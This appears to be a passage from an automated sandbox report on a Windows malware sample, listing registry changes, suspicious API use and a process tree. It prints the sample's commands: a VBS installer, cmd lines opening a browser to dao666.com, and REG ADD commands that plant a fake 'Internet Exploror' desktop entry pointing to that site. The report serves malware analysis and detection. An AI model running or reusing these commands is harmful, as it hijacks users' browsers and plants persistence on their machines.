| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\8a903fdc2c88d4b47405519f174877cd_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
System Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\net.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\net1.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3573156976" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 805f97d5cb2ddb01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{0073E4C4-99BF-11EF-9361-DA67B56E6C1B} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 701a9cd5cb2ddb01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ab44cbc7ac5e824ba8748f8001f100a1000000000200000000001066000000010000200000001bd76d8427eb09eda2e3e147e3c6b3ed6f027e37ef29afba965e14d07357a4f5000000000e8000000002000020000000b7339b69ac3c3859a00e3bc1f5fdb0f46b804976e35320c44c36e73d42e2524720000000a5a6543e5f86d4638a3b9bed99a003310781fafdf70ca4c75d516f5ae9e086a140000000c6ea66e90d760528585e6747c610b5214cf80a93ed42dd5320207ed01436cdca9dbed98b0525057e9bc7a3118f9d6fe00cc0187d8453cd9f59cb473d3d238ee2 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3570969437" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31141323" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "437388084" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31141323" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ab44cbc7ac5e824ba8748f8001f100a100000000020000000000106600000001000020000000a8d3f9ef91da089972a9cb26db5b2445905ee8751fb06a65e35b5778b72343a2000000000e8000000002000020000000f0a9498830bfb5c37da4beee450e8b376f90174df219bca1bb147c2f460f8e682000000063981dbd0ce2420c13a03d91a37f78010c4fa4143ab709e3c3c2d11da03e9afb400000004cdd877cf45ffc66360df437418f415a09154368c8e41cb47dee151c5802428a4288f804313c38130dbf1ea02f8cd622fe726e96dc7faf44fc793cfc1e442a53 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3570969437" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31141323" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\ = "┤≥┐¬╓≈╥│(&H)" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://www.dao666.com/?in" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ = "%systemRoot%\\SysWow64\\shdocvw.dll" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\WantsParsDisplayName | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideFolderVerbs | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H) | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\MUIVerb = "@shdoclc.dll,-10241" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://www.dao666.com/?in" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideOnDesktopPerUser | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ = "shdoclc.dll,0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InfoTip = "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R) | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\Attributes = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\8a903fdc2c88d4b47405519f174877cd_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\LocalizedString = "Internet Exploror" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H) | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\ | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\8a903fdc2c88d4b47405519f174877cd_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\8a903fdc2c88d4b47405519f174877cd_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install_7xdown.vbs"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C start /min iexplore http://dao666.com/index2.html?7xdown
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://dao666.com/index2.html?7xdown
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\tool.cmd
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:968 CREDAT:17410 /prefetch:2
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "InfoTip" /t REG_SZ /d "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "LocalizedString" /t REG_SZ /d "Internet Exploror" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f
C:\Windows\SysWOW64\reg.exe
